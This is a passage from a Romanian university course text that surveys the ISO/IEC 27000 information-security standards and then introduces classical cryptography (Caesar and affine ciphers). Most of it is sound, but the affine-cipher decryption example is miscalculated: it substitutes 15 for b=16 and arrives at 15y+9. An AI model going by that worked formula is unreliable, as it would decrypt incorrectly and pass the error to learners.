informației general acceptate. De asemenea, standardul este destinat elaborării de linii directoare de
management al securității informației specifice domeniului de activitate sau organizațiilor, luând în
considerare mediul lor specific privind riscurile de securitate a informației.
ISO/IEC 27002:2013 furnizează linii directoare pentru standardele de securitate a
informației și practicile de management al securității informației ale organizației, inclusiv alegerea,
implementarea și managementul mijloacelor de control, cu luarea în considerare a mediului de risc
de securitate a informației al organizației.

Tehnologii Informaționale 7
AC ADEMIA DE STUDII ECONOMICE A MOLDOVEI

Acest standard internațional este conceput să fie utilizat de organizații care intenționează:
a) să aleagă mijloace de control în cadrul procesului de implementare a unui
sistem de management al securității informației pe baza ISO/IEC 27001;
b) să implementeze mijloace de control de securitate a informației general
acceptate;
c) să dezvolte propriile linii directoare referitoare la managementul securității
informației.
3.3.4. ISO/IEC 27003:2017
ISO/IEC 27003:2017, Tehnologia informaţiei - Tehnici de securitate - Îndrumări privind
implementarea unui sistem de management al securităţii informaţiei.
Standardul ISO/IEC 27003:2017 se concentrează pe aspectele critice necesare pentru
proiectarea şi implementarea cu succes a unui sistem de management al securităţii informaţiilor
(SMASI), în conformitate cu ISO/IEC 27001:2013.
Acesta descrie procesul de design şi specificaţii pentru un SMSI de la iniţiere şi până la
realizarea planurilor de implementare. Standardul ISO/IEC 27003:2017 descrie procesul de obţinere
a aprobării de implementare a unui SMSI, defineşte proiectul de implementare şi oferă îndrumări cu
privire la modul de concepere a unui proiect SMSI.
Preşedintele grupului de lucru ce a dezvoltat ISO/IEC 27003 (dar și alte standarde), prof.
Edward Humphreys, a menționat: “Prin utilizarea ISO/IEC 27003, organizaţia va fi capabilă să
dezvolte un proces pentru gestionarea informaţiilor de securitate, oferind părţilor interesate
asigurarea că riscurile legate de activele informaţionale sunt menţinute în permanenţă în parametrii
optimi de siguranţa, limite stabilite de însăşi organizaţia implementatoare”.
Standardul ISO/IEC 27003:2017 este destinat pentru a fi utilizat împreună cu standardele
ISO/IEC 27001:2013 şi ISO/IEC 27002:2013, fără a modifica sau elimina nici o prevedere stipulată
de cele două standarde. Acest standard oferă concepte legate de planificarea şi proiectarea unui
sistem de management al securităţii informaţiei, rezultând într-un final un plan riguros de
implementare a unui proiect SMSI.
Standardul furnizează îndrumări practice pentru diverse aspecte:
1) Obţinerea aprobării conducerii pentru iniţierea unui proiect SMSI:
 aspecte generale privind obţinerea aprobării conducerii pentru iniţierea unui
proiect SMSI;
 clarificarea priorităţilor organizaţiei pentru a dezvolta un SMSI;
 definirea domeniului de aplicare preliminar al SMSI;

Tehnologii Informaționale 8
AC ADEMIA DE STUDII ECONOMICE A MOLDOVEI

 elaborarea analizei afacerii şi a planului proiectului pentru aprobare de către


conducere;
2) Definirea domeniului de aplicare, a frontierelor şi a politicii SMSI:
 aspecte generale privind definirea domeniului de aplicare, a frontierelor şi a
politicii SMSI;
 definirea domeniului de aplicare organizaţional şi a frontierelor sale;
 definirea domeniului de comunicaţii şi tehnologia informaţiei şi a frontierelor
acestuia;
 definirea domeniului fizic şi a frontierelor acestuia;
 integrarea fiecărui domeniu şi a frontierelor acestuia pentru a obţine
domeniul de aplicare al SMSI şi a frontierelor sale;
 dezvoltarea politicii SMSI şi obţinerea aprobării din partea conducerii;
3) Realizarea analizei cerinţelor privind securitatea informaţiei:
 aspecte generale privind realizarea analizei cerinţelor privind securitatea
informaţiei;
 definirea cerinţelor de securitate a informaţiei pentru procesele SMSI;
 identificarea resurselor din domeniul de aplicare al SMSI;
 realizarea unei evaluări a securităţii informaţiei;
4) Realizarea aprecierii riscului şi planificarea tratării riscului:
 aspecte generale privind realizarea evaluării riscului şi planificarea tratării
riscului;
 realizarea evaluării riscului;
 selectarea obiectivelor de control şi a mijloacelor de control;
 obţinerea autorizării de către conducere pentru implementarea şi funcţionarea
SMSI;
5) Proiectarea SMSI:
1. aspecte generale privind proiectarea SMSI;
2. proiectarea securităţii informaţiei organizaţionale;
3. proiectarea securităţii informaţiei TIC şi fizice;
4. proiectarea securităţii informaţiei specifică SMSI;
5. realizarea planului final al proiectului SMSI;
De asemenea, standardul cuprinde şi cinci anexe informative referitoare la:
1. lista de verificări;
2. rolurile şi responsabilităţile pentru securitatea informaţiei;
Tehnologii Informaționale 9
AC ADEMIA DE STUDII ECONOMICE A MOLDOVEI

3. informaţii despre auditul intern;


4. structura politicilor;
5. monitorizare şi măsurare.
3.3.5. ISO/IEC 27004:2016
ISO/IEC 27004:2016, Tehnologia informaţiei - Tehnici de securitate - Managementul
securităţii informaţiei – Evaluări.
Acest standard furnizează îndrumări pentru elaborarea și utilizarea măsurilor și a măsurării
în vederea evaluării eficacității unui SMSI implementat și a mijloacelor de control sau grupurilor de
mijloace de control, așa cum este specificat în ISO/IEC 27001.
Programul de măsurare a securității informației va ajuta managementul să identifice și să
evalueze procesele și mijloacele de control SMSI care nu sunt conforme și eficace și să stabilească
priorități pentru acțiunile asociate cu îmbunătățirea sau modificarea acestor procese și/sau mijloace
de control. De asemenea, acesta poate ajuta organizația să demonstreze conformitatea cu ISO/IEC
27001 și să furnizeze dovezi suplimentare pentru procesele de analiză de către management și
pentru procesele de management al riscului de securitate a informației.
Acest standard are la bază ipoteza că elaborarea măsurilor și a măsurării pornește de la o
profundă înțelegere a riscurilor de securitate a informației pe care o organizație le întâmpină și că
activitățile de evaluare a riscului ale organizației s-au desfășurat corect (adică pe baza ISO/IEC
27005), așa cum este cerut de ISO/IEC 27001. Programul de măsurare a securității informației va
încuraja o organizație să furnizeze părților interesate relevante informații de încredere referitoare la
riscurile de securitate a informației și la stadiul managementului acestor riscuri în SMSI
implementat.
După implementarea efectivă, programul de măsurare a securității informației va îmbunătăți
încrederea părților interesate în rezultatele măsurării și va permite părților interesate să utilizeze
aceste măsuri pentru îmbunătățirea continuă a securității informației și a SMSI.
Rezultatele acumulate ale măsurării vor permite compararea progresului obținut în atingerea
obiectivelor de securitate a informației pe un interval de timp, ca parte a procesului de îmbunătățire
continuă a SMSI-ului organizației.
3.3.6. ISO/IEC 27005:2011
ISO/IEC 27005:2011, Tehnologia informaţiei - Tehnici de securitate - Managementul
riscului securităţii informaţiei.
Standardul ISO/IEC 27005:2011 stabileşte ghidul pentru managementul riscului securităţii
informaţiei. Susţine conceptele generale specificate în ISO/IEC 27001 şi este conceput pentru a

Tehnologii Informaționale 10
AC ADEMIA DE STUDII ECONOMICE A MOLDOVEI

asista la punerea cu succes în aplicare a securităţii informaţiilor bazate pe o abordare de


management al riscului.
Cunoaşterea de concepte, modele, procese şi terminologia descrisă în ISO/IEC 27001 şi
ISO/IEC 27002 este importantă pentru o înţelegere completă a ISO/IEC 27005:2011. Acest
standard este aplicabil tuturor tipurilor de organizaţii (societăţi comerciale, agenţii guvernamentale
sau organizaţii non-profit) care intenţionează să gestioneze riscurile care ar putea compromite
securitatea informaţiilor dintr-o organizaţie.
Standardul ISO/IEC 27005:2011 oferă directorilor și angajaților din departamentele IT o
platformă de dezvoltare pentru implementarea unei abordări orientată spre gestionarea riscurilor
care să îi ajute în administrarea riscurilor legate de sistemul de management al securității
informației.
Edward Humphreys, organizatorul grupului de lucru ISO/IEC care a dezvoltat standardul,
comentează: “ISO/IEC 27005:2011 este un standard esențial pentru aceia care doresc să își
gestioneze riscurile eficient și, mai ales, să fie în conformitate cu popularul standard al sistemului
de management al securității informației ISO/IEC 27001. Managementul riscului este decisiv pentru
o conducere bună a afacerii, iar acest standard ajută organizațiile cu sfaturi despre de ce, ce și cum
să fie gestionate riscurile legate de securitatea informației în sprijinul obiectivelor lor de
conducere.”
În această a doua ediție, cadrul subliniat în ISO/IEC 27005 a fost trecut în revistă și
actualizat pentru a reflecta conținutul documentelor de management al riscului:
 ISO 31000:2009, Managementul riscului – Principii și linii directoare;
 ISO/IEC 31010:2009, Managementul riscului – Tehnici de evaluare a riscului;
 ISO Guide73:2009, Managementul riscului – Vocabular.
Standardul ISO/IEC 27005:2011 a fost conceput cu intenția de a se alinia strâns lui ISO
31000:2009, cu scopul de a ajuta organizațiile care doresc să își gestioneze riscurile securității
informației într-o manieră similară celei în care își gestionează “alte” riscuri.
Procesul de management al riscurilor legate de securitatea informației constă din:
 stabilirea contextului;
 evaluarea riscului;
 tratarea riscului;
 acceptarea riscului;
 comunicarea riscului;
 monitorizarea și analizarea riscului.

Tehnologii Informaționale 11
AC ADEMIA DE STUDII ECONOMICE A MOLDOVEI

Cu toate acestea, ISO 27005:2011 nu oferă nici o metodologie specifică pentru


managementul riscurilor legate de securitatea informației, ci o abordare generală. Rămâne la
latitudinea organizației să-și definească abordarea față de managementul riscului în funcție, de
pildă, de domeniul sistemului de management al securității informației, bazându-se pe contextul
managementului riscului sau pe sectorul industrial în care activează.
3.3.7. ISO/IEC 27006:2015
ISO/IEC 27006:2015, Tehnologia informaţiei - Tehnici de securitate - Cerinţe pentru
organizaţiile ce efectuează audit şi certificare a sistemelor de management al securităţii
informaţiei.
Standardul ISO/IEC 27006:2015 specifică cerinţele şi oferă îndrumări pentru organizaţiile ce
efectuează audit şi certificare a sistemului de management al securităţii informaţiilor. Standardul
este în esenţă destinat să sprijine acreditarea organismelor de certificare ce oferă certificare a
sistemului de management a securităţii informaţiilor.
Cerinţele cuprinse în ISO/IEC 27006:2015 trebuie să fie demonstrate în termeni de
competenţă şi fiabilitate de către orice organizaţie de certificare a SMSI iar orientările cuprinse în
ISO/IEC 27006:2015 oferă servicii de interpretare adiţionale a acestor cerinţe pentru orice
organizaţie de certificare a SMSI.
3.3.8. ISO/IEC 27011:2016
ISO/IEC 27011:2016, Tehnologia informaţiei - Tehnici de securitate - Ghidul
managementului securităţii informaţiei pentru organizaţiile din domeniul telecomunicaţiilor bazat
pe standardul ISO/IEC 27002.
Scopul acestui standard este de a defini îndrumări în sprijinul implementării
managementului securităţii informaţiilor în cadrul organizaţiilor de telecomunicaţii. Adoptarea
prezentului standard va permite companiilor de telecomunicaţii să întrunească cerinţele de bază ale
managementului securităţii informaţiilor: confidenţialitate, integritate şi disponibilitate, precum şi
orice altă proprietate relevantă de securitate.
3.3.9. ISO/IEC 27032:2012
ISO/IEC 27032:2012 - Tehnologia informaţiei - Tehnici de securitate - Ghid pentru
securitatea cibernetică.
Acest standard oferă un cadru pentru partajarea informaţiilor, coordonare şi tratarea
incidentelor. Standardul oferă documentaţia necesară pregătirii sistemului informatic împotriva
atacurilor, detectării şi monitorizării acestora. Utilizatorii vor putea răspunde în mod adecvat unor
atacuri cum ar fi malware, spyware sau inginerie socială.

Tehnologii Informaționale 12
AC ADEMIA DE STUDII ECONOMICE A MOLDOVEI

Potrivit organizatorului grupului de lucru responsabil de elaborarea acestui standard, Johann


Amsenga, faptul că reţelele care alcătuiesc spaţiul virtual le aparţin mai multor proprietari stă la
baza mai multor probleme de securitate, deoarece aceştia nu comunică între ei şi au o percepţie
diferită asupra securităţii din cauza diferenţelor dintre activităţile pe care le desfăşoară şi dintre
reglementările pe care le aplică. În acest context, standardul ISO 27032 reprezintă o soluţie globală
care va ajuta la atenuarea riscurilor care ameninţă securitatea cibernetică.
3.3.10. ISO/IEC 27035:2016
ISO/IEC 27035:2016 - Tehnologia informaţiei - Tehnici de securitate – Managementul
incidentelor legate de securitatea informației.
ISO 27035:2016 constă din trei părți (27035-1, 27035-2, 27035-3) care oferă instrucțiuni
despre detectarea, raportarea și evaluarea incidentelor și vulnerabilităților legate de securitatea
informației. El înlocuiește raportul tehnic ISO/IEC TR 18044:2004 și sprijină conceptele generale
specificate în ISO/IEC 27001:2013.
Noul standard ISO 27035 poate fi aplicat de orice organizație, indiferent de mărimea sa. El
acoperă o serie de incidente legate de securitatea informației, deliberate sau accidentale, cauzate
prin mijloace fizice sau tehnice.
ISO/IEC 27035 stabilește o abordare structurată și planificată privind:
 detectarea, raportarea și evaluarea incidentelor de securitate a informațiilor;
 reacția la incidentele de securitate a informațiilor și gestionarea lor;
 detectarea, evaluarea și gestionarea vulnerabilităților de securitate a informațiilor;
 îmbunătățirea permanentă a securității informațiilor și gestionarea incidentelor, ca
urmare a gestionării incidentelor de securitate a informațiilor și a vulnerabilităților.
De reținut că standardul include managementul vulnerabilităților, precum și gestionarea
incidentelor.
ISO 27035 oferă mai multe avantaje:
 îmbunătățirea întregii securități a informației;
 reducerea impactului negativ asupra afacerii;
 consolidarea unor elemente ca atenția acordată prevenirii incidentelor, stabilirea lor
ca prioritate și strângerea de dovezi referitor la ele;
 contribuția adusă justificării bugetului și resurselor;
 îmbunătățirea actualizărilor aduse evaluării riscului legat de securitatea informației și
a rezultatelor manageriale;
 oferirea de materiale pentru programele de formare și de conștientizare la problemele
securității informației;

Tehnologii Informaționale 13
AC ADEMIA DE STUDII ECONOMICE A MOLDOVEI

 furnizarea de date de intrare necesare politicilor privind securitatea informației și de


analize ale documentației asociate.
Lista completă de standarde ale securității informației poate fi vizualizată pe pagina oficială
a ISO https://www.iso.org/ics/35.030/x/. În această listă sunt prezentate atât standardele publicate,
cât și cele în curs elaborare, standardele retrase și proiectele eliminate.

Întrebări și subiecte pentru aprofundarea cunoștințelor și lucrul individual


1. Care este rolul standardelor în asigurarea securității informației în cadrul unei
întreprinderi sau organizații?
2. Cine este responsabil la nivel internațional de elaborarea standardelor de securitate a
informației? Descrieți succint fiecare astfel de organism internațional.
3. Descrieți structură responsabilă în RM pentru elaborarea standardelor de securitate a
informației. Care este regulamentul de bază în vederea aprobării standardelor externe
ca standarde moldovenești?
4. Care dintre standardele familiei ISO 27000 poate fi supus certificării. Este oare
certificarea benevolă sau obligatorie? Pentru ce servesc celelalte standarde ale
familiei ISO 27000?
5. Faceți o descriere succintă a standardelor care au stat la baza familiei de standarde de
securitate ISO 27000.

Tehnologii Informaționale 14
TEMA 5: INTRODUCERE ÎN CRIPTOGRAFIE

Obiectivele temei:
 Familizarizarea cu obiectivele și noțiunile de bază ale criptografiei.
 Analiza cifrurilor clasice.
 Studierea mecanismelor de criptare.
 Introducere în atacurile criptografice.

Cuvinte-cheie:
cifru, cifru polialfabetic,
sistem de criptare, mașini rotor,
text clar, criptanaliză,
text criptat, atacuri criptografice,
substituția, forţă brută ( metoda
transpunerea, exhaustivă).
cifru monoalfabetic,

Există dovezi că criptografia ca metodă de protecție a textului s-a născut odată cu apariția
scrisului, iar metodele de secretizare a mesajelor erau deja cunoscute de civilizațiile antice din
India, Egipt și Mesopotamia. Cele mai vechi texte indiene printre cele 64 de arte menționau și
metodele de modificare a textului, unele dintre care pot fi considerate metode criptografice. Pentru a
ascunde ce a scris, autorul unei plăci din Mesopotamia ce conținea o rețetă pentru fabricarea
glazurii pentru ceramică utiliza semne necunoscute, sărea peste unele litere, iar numele le înlocuia
cu cifre. De atunci au fost găsite mai multe referiri la criptografie, cea mai mare parte a având o
utilizare militară.
În zilele noastre Criptografia oferă unele dintre cele mai bune metode (dacă nu chiar cele
mei bune) de protecție a informației. Metodele criptografice sunt aplicate în rețele și pe WEB, ele
sunt implementate în aplicații software și pe dispozitive hardware, devenind deja un accesoriu
indispensabil al tehnologiilor moderne.

5.1. Obiective și noțiuni de bază ale criptografiei


5.1.1. Noțiune de criptografie
Criptografia reprezintă o ramură a matematicii care se ocupă cu securizarea informaţiei,
asigurând de asemenea autentificarea şi restricţionarea accesului într-un sistem informatic. În
realizarea acestora se utilizează în mare parte metode matematice, profitând de unele probleme cu
complexitate de rezolvare suficient de înaltă. Termenul „criptografie” este compus din cuvintele de

1
origine greacă κρυπτός, kryptós (ascuns) şi γράφειν, gráfein (a scrie). Criptografia modernă
urmăreşte realizarea următoarelor obiective:
 confidenţialitatea (privacy) – proprietatea de a păstra secretul informaţiei, pentru ca
aceasta să fie folosită numai de persoanele autorizate;
 integritatea datelor (integrity) – proprietatea de a evita orice modificare (inserare,
ştergere, substituţie) neautorizată a informaţiei;
 autenticitatea (authenticity) – proprietatea de a identifica o entitate conform
anumitor standarde, care include autenticitatea unei entităţi sau a sursei informaţiei;
 non-repudierea (nonrepudiation) – proprietatea care previne negarea unor
evenimente anterioare.
Celelalte obiective legate de securitatea informaţiei (autentificarea mesajelor, semnături,
autorizare, validare, controlul accesului, certificare, timestamping, confirmarea recepţiei,
anonimitate, revocare) pot fi derivate din aceste patru.
Împreună cu Criptografia se dezvoltă Criptanaliza – (din greacă, kryptós, „ascuns”, şi
analýein, „a dezlega”) studiul metodelor de obţinere a înţelesului informaţiilor criptate, fără a avea
acces la informaţia secretă necesară în mod normal pentru aceasta. De regulă, aceasta implică
găsirea unei chei secrete. Criptografia şi Criptanaliza împreună constituie Criptologia (din greacă,
kryptós, „ascuns”, şi λόγος, „cuvânt”) – ştiinţa care se ocupă cu metodele de criptare şi decriptare.
În continuare sunt date unele noţiunile fundamentale cu care se operează în criptologie.
O mulţime nevidă T se numeşte alfabet.
Elementele alfabetului T se numesc litere.
O consecutivitate finită de elemente din alfabetul T se numeşte cuvânt. Una şi aceeaşi literă
poate intra într-un cuvânt de mai multe ori.
Numărul de elemente ale alfabetului se numeşte lungimea alfabetului.
Un cuvânt ce nu conţine nici o literă se numeşte cuvânt nul.
Lungimea cuvântului, notată deseori cu w, este numărul de litere în acest cuvânt, unde
fiecare literă se consideră de câte ori se întâlneşte în el.
Vom nota cu T* mulţimea tuturor cuvintelor alfabetului T. Submulţimile mulţimii T* le vom
numi limbaje (formale) peste T.
Un mesaj în forma sa originară se numeşte text clar (uneori text în clar sau text plan, în
engleză plaintext) şi îl vom nota cu pt sau cu m sau M (de la „message” - mesaj).
Rescrierea textului clar, folosind o metodă cunoscută numai de expeditor (eventual şi de
destinatar), se numeşte criptare (sau cifrare) a mesajului. Scopul rescrierii textului clar are ca scop
camuflarea textului clar în aşa fel încât substanţa să nu sufere modificări semantice pentru ca
mesajul să poată fi restabilit de destinatar în versiunea inițială a acestuia.

2
Text criptat sau text cifrat (în engleză ciphertext) se numeşte textul obţinut în rezultatul
operaţiei de criptare a textului plan. Textul criptat îl vom nota cu ct, cu c sau cu C (de la „cipher” -
cifrul). Textul cifrat se mai numeşte criptogramă.
Procesul retransformării criptogramei în textul original este numit decriptare sau descifrare.
În procesul schimbului de informație criptată destinatarul primeşte printr-un canal textul
criptat de la expeditor şi îl decriptează, ştiind metoda folosită pentru criptare, iar în rezultat el obţine
mesajul iniţial. În literatura de specialitate expeditorul de obicei este numit Alice iar destinatarul
este numit Bob. Deci, Alice şi Bob trebuie să stabilească în prealabil detaliile modalităţii de criptare
şi de decriptare.
Criptarea se foloseşte pentru a fi siguri că informaţia este inaccesibilă oricărei persoane care
nu deţine instrumentul necesar decriptării. Chiar dacă oricine poate vedea datele în formă
criptografică, oricum nu va înţelege nimic, care să conducă spre descifrarea textului original.
Persoana care interceptează criptograma şi încearcă să obţină textul clar aplicând diverse metode,
însă fără a avea cheia de decriptare, este numită criptanalist.
5.1.2. Sisteme de criptare
Un sistem care realizează operaţiile de criptare şi decriptare se numeşte sistem de criptare
(sau sistem criptografic, sau criptosistem). În criptografia modernă un sistem de criptare este definit
ca o structură cu cinci componente (P, C, K, E, D):
 P = {m : m  T*} – spaţiul (mulţimea) textelor în clar, scrise pentru un alfabet nevid T (în
mod obişnuit T={0,1});
 K – spaţiul (mulţimea) cheilor de criptare k, k  K;
 Familia funcţiilor de criptare dependentă de chei şi de un algoritm de criptare E
Ek : P  C, Ek = {ek : ek (m) = c şi ek este injectivă};
 Familia funcţiilor de decriptare dependentă de chei şi de un algoritm de decriptare D
Dk : C  P , Dk = { dk : dk (ek (m))= m pentru orice m  P};
 C spaţiul (mulţimea) mesajelor cu text criptat unde:
C={c : există k  K, m  P, c = Ek (m)}.
Schema aplicării unui sistem de criptare este prezentată în figura 5.1.

ek (m) = c

Figura 5.1. Schema aplicării unui sistem de criptare

3
Un sistem de criptare este realizat în baza a trei algoritmi: algoritmul de criptare ek,
algoritmul de decriptare dk și algoritmul de generare a cheilor.
Pentru ca un sistem de criptare să fie considerat bun, el trebuie să îndeplinească trei criterii
(enunţate de Francis Bacon în sec. XVII):
1. Fiind date ek şi m  P să fie uşor de calculat ek (m).
2. Fiind date dk şi c  C să fie uşor de determinat dk (c).
3. Să fie imposibil de determinat m din c, fără a cunoaşte k.
Criteriile 1 şi 2 implică faptul că pentru utilizatorii legali algoritmii de criptate și decriptare
nu trebuie să fie prea complicați (se presupune că utilizatorii au un timp acceptabil pentru calcule).
În criteriul 3 „imposibilitatea” e înlocuită în prezent cu „dificultatea de a calcula”. Se presupune că
un interceptor de asemenea are acces la tehnica de calcul. Ultimul criteriu defineşte (sub o formă
vagă) ideea de ”securitate” a sistemului. La aceste criterii, Bacon adăuga şi o a patra regulă:
4. Textul criptat trebuie să fie un text banal, fără suspiciuni.
Această condiţie nu mai poate fi considerată importantă şi este utiliză astăzi doar de un
subdomeniu strict al criptografiei, numit steganografie – ştiinţa despre transmiterea secretă a
informaţiei prin păstrarea secretului a însuşi faptului transmiterii acestei informaţii.
5.1.3. Tipuri de cifruri
Metodele de criptare pot fi divizate pe categorii în felul următor (figura 5.2):
a) în funcţie de tipul operaţiilor folosite:
 bazate pe substituţii;
 bazate pe transpuneri;
b) în funcţie de tipul de chei folosite:
 metode simetrice (cu cheie secretă);
 metode asimetrice (cu cheie publică);
c) metoda prin care datele sunt procesate:
 cu cifruri bloc;
 cu cifruri fluide (flux, şir).
Cifrurile clasice foloseau substituţia sau transpoziţia. Printre metodele moderne de criptare
deosebim două direcţii principale: cifruri cu cheie secretă (sau cifruri simetrice) în care ek este
bijectivă şi cifruri cu chei publice (sau cifruri asimetrice) – cifruri în care ek nu este bijectivă.

4
Figura 5.2. Clasificarea cifrurilor
Cifrurile simetrice pot fi de tip bloc sau de tip şir (sau flux, sau fluide, în engleză stream
cipher). Algoritmii de tip bloc acţionează asupra blocurilor de text clar şi text cifrat. Algoritmii de
tip şir se aplică şirurilor de text clar şi text cifrat, la nivel de bit sau octet.
Algoritmii moderni de tip bloc criptează mesajul în blocuri de 64 – 265 biţi (lungimea de 64
biți este deja considerată insuficientă, standardul curent de cifrare simetrică – AES – lucrează cu
blocuri de lungime 128, 192 sau 256 biți). Pentru acesta se aplică o funcţie matematică între un bloc
de biţi ai mesajului în clar şi cheie (care poate varia ca mărime), rezultând acelaşi număr de biţi
pentru mesajul criptat. Funcţia de criptare este realizată astfel încât să îndeplinească următoarele
cerinţe:
 cunoscând un bloc de biţi ai textului clar şi cheia de criptare, algoritmul să poată
genera rapid un bloc al textului criptat;
 cunoscând un bloc de biţi ai textului criptat şi cheia de criptare/decriptare, sistemul
să poată genera rapid un bloc al textului clar;
 cunoscând blocurile textului clar şi ale textului criptat, să fie dificil de generat cheia.
Cifrurile şir la fel formează o clasă importantă de algoritmi de criptare. Ceea ce le
caracterizează şi le diferenţiază faţă de cifrurile bloc este faptul că cifrurile şir procesează
informaţia în unităţi oricât de mici, chiar bit cu bit, aplicând funcţia XOR între biţii cheii şi biţii de
cifrat, iar funcţia de criptare se poate modifica în cursul criptării. Cifrurile şir sunt algoritmi cu
memorie, în sensul că procesul de criptare nu depinde doar de cheie şi de textul clar, ci şi de starea
curentă. În cazul în care probabilitatea erorilor de transmisie este mare, folosirea cifrurilor şir este
avantajoasă deoarece au proprietatea de a nu propaga erorile. Ele se folosesc şi în cazurile în care
datele trebuie procesate una câte una, datorită lipsei de spaţiu de memorie.
Cifruri asimetrice utilizează o pereche de chei: o cheie publică și o cheie privată. Un
utilizator care deține o astfel de pereche își publică o cheie (cheia publică) astfel încât oricine

5
dorește să o poată folosi pentru a-i transmite un mesaj criptat. Numai deținătorul cheii secrete
(private) este cel care poate decripta mesajul astfel criptat.
Cele două chei sunt legate matematic, însă cheia privată nu poate fi obținută din cheia
publică. În caz contrar, oricine ar putea decripta mesajele destinate unui alt utilizator, fiindcă oricine
are acces la cheia publică a acestuia. O analogie foarte potrivită pentru proces este folosirea cutiei
poștale. Oricine poate pune în cutia poștală a cuiva un plic, dar la plic nu are acces decât posesorul
cheii de la cutie.
Criptografia asimetrică se mai numește criptografie cu chei publice şi e compusă din două
mari ramuri:
 criptarea cu cheie publică – un mesaj criptat cu o cheie publică nu poate fi
decodificat decât folosind cheia privată corespunzătoare. Metoda este folosită pentru
a asigura confidențialitatea;
 semnături digitale – un mesaj semnat cu cheia privată a emițătorului poate fi verificat
de către oricine, prin acces la cheia publică corespunzătoare, astfel asigurându-se
autenticitatea mesajului.

5.2. Cifruri clasice


Criptografia clasică se încadrează în clasa criptografiei cu chei simetrice și este criptografia
dinaintea calculatorului, de unde şi denumirea de criptografie pre-computaţională. În criptografia
clasică, algoritmii erau bazaţi pe caracter şi constau dintr-o serie de transformări elementare
(substituţii și transpoziţii) ale caracterelor textului clar. Unii algoritmi aplicau aceste transformări în
mod repetat, îmbunătăţind în acest mod securitatea algoritmului. În criptografia modernă bazată pe
calculator (criptografie computaţională), lucrurile s-au complicat, dar multe dintre ideile
criptografiei clasice au rămas nemodificate.
5.2.1. Cifrul de substituţie
Cifrul de substituţie (substitution cipher) este cifrul la care fiecare caracter sau grup de
caractere ale textului clar m este substituit cu un alt caracter sau grup de caractere în textul cifrat c,
descifrarea făcându-se prin aplicarea substituţiei inverse asupra textului cifrat. În criptografia
clasică există patru tipuri de cifruri de substituţie: monoalfabetică, polialfabetică, poligramică și
homofonică.
Cifruri de substituţie monoalfabetică (monoalphabetic ciphers) sunt cifrurile în care fiecare
caracter al textului în clar m este înlocuit cu un caracter corespunzător în textul cifrat c.
Reprezentanți ai acestei clase sunt: cifrul Cezar, cifrul Afin, cifrul Polibios, etc.
Cifrul lui Cesar (sau Cezar). În acest cifru fiecare literă a textului clar este înlocuită cu o
nouă literă obţinută printr-o deplasare alfabetică. Cheia secretă k, care este aceeaşi la criptare cât şi
la decriptare, constă în numărul care indică deplasarea alfabetică, adică k{1, 2, 3,…, n–1}, unde n
6
este lungimea alfabetului. Criptarea şi decriptarea mesajului cu cifrul Cezar poate fi definită de
formulele
c = ek(x) = x + k (mod n),
m = dk(y) = y – k (mod n),
unde x și y sunt reprezentarea numerică a caracterului respectiv al textului clar. Funcţia numită
Modulo (a mod b) returnează restul împărţirii numărului întreg a la numărul întreg b. Această
metodă de criptare este numită aşa după Iulius Cezar, care o folosea pentru a comunica
cu generalii săi, folosind cheia k = 3 (tabelul 5.1).
De exemplu, pentru k = 3 avem
ek(S) = 18 + 3 (mod 26) = 21 = V
dk(V) = 21 – 3 (mod 26) = 18 = S
În acest caz pentru m =„cifrul cezar”, obținem c =„fliuxo fhcdu”.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25
ABCDE FG H I J K L M N O P Q R S T U V W X Y Z
3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 0 1 2
DEFGH I J K L M N O P Q R S T U V W X Y Z A B C
Tabelul 5.1. Cifrul Cezar cu cheia k=3
Cifrul lui Cezar este foarte uşor de spart, deci este un cifru foarte slab. Astfel, un criptanalist
poate obţine textul clar prin încercarea tuturor celor 25 de chei. Nu se ştie cât de util era cifrul Cezar
în timpul când era folosit de către cel de la care îi provine numele, dar este probabil ca el să fi
fost destul de sigur, atât timp cât numai câţiva dintre inamicii lui Cezar erau în stare să scrie şi
să citească, dar mai ales să cunoască concepte de criptanaliză.
Cifrul afin este o generalizare a cifrului Cezar, având cheia
k = {(a, b) | a, b ∈ Z26 = {0, 1, 2, …, 25}, cmmdc(a, 26) = 1},
iar funcţiile de criptare şi decriptare pentru o cheie k = (a, b) sunt
ek(x) = ax + b (mod 26)
și
dk(y) = a −1(y+26 − b) (mod 26),
unde a·a−1 =1 modn.
Condiţia ca a să fie prim cu 26 asigură existenţa lui a−1 în Z26. Pentru calcularea lui a−1 poate
fi aplicat algoritmul Euclid extins (vezi compartimentul 7), sau se verifică pa rând toate numerele
reciproc prime cu a în clasa modulo n până când găsim acel număr pentru care a·a−1 =1 modn,
acesta fiind și unicul cu o astfel de proprietate.
De exemplu, pentru a = 7, b = 16 funcţia de criptare este ek(x) = 7x + 16. În acest caz pentru
m =„cifrul afin”, obținem c =„ euzfap qzud”.
Deoarece 7·15 =1 (mod26), avem 7−1 = 15 (mod 26), iar decriptarea se realizează matematic
folosind funcţia
7
dk(y)= 15· (y+26−15)(mod 26)=15y+15·11 (mod 26)=15y + 9 (mod 26).
Condiţia cmmdc(a, 26)=1 asigură de asemenea injectivitatea funcţiei ek, necesară pentru un
proces corect de criptare-decriptare. De exemplu, pentru ek(x) = 10x + 1, A şi N se transformă
ambele în B, iar O nu apare ca imagine în alfabetul substituţiei. În acest caz avem:
cmmdc(a, 26)= cmmdc(10, 26)=2≠1.
Astfel de cazuri au loc întotdeauna atunci când a nu respectă condiția de mai sus.
Orice cheie k a cifrului afin este determinată complet de valorile întregi (a, b) pentru care
cmmdc(a, 26) = 1. Sunt posibile 12 valori pentru a: 1, 3, 5, 7, 9, 11, 15, 19, 21, 23, 25 şi 26 valori
pentru b, care se iau independent de a, cu o singură excepţie a = 1, b = 0 (care se exclude deoarece
nu conduce la nici o criptare). Aşadar mulţimea cheilor în acest caz este alcătuită din 12·26–1=311
chei diferite, număr suficient de mic pentru atacul prin forţa brută, adică prin verificarea tuturor
cheilor posibile.
Trebuie de avut în vedere că în cazul în care este necesar de a cripta mesaje în limba română
sau rusă (sau oricare altă limbă care are un alfabet) procedeul rămâne același, doar că trebuie să
ținem cont de faptul că alfabetele respective au 31 și 33 de litere, adică n=31 și respectiv n=33.
Cifrul Polibios. Cifrul Cezar nu este cel mai vechi algoritm de criptare. Se pare că primul
astfel de algoritm a fost utilizat de Polybios (istoric grec, care a decedat cu 30 ani înaintea naşterii
lui Cezar). Iniţial acesta a fost doar un sistem maritim de semnalizare cu torţe iar ulterior i s-a dat o
semnificaţie criptografică.
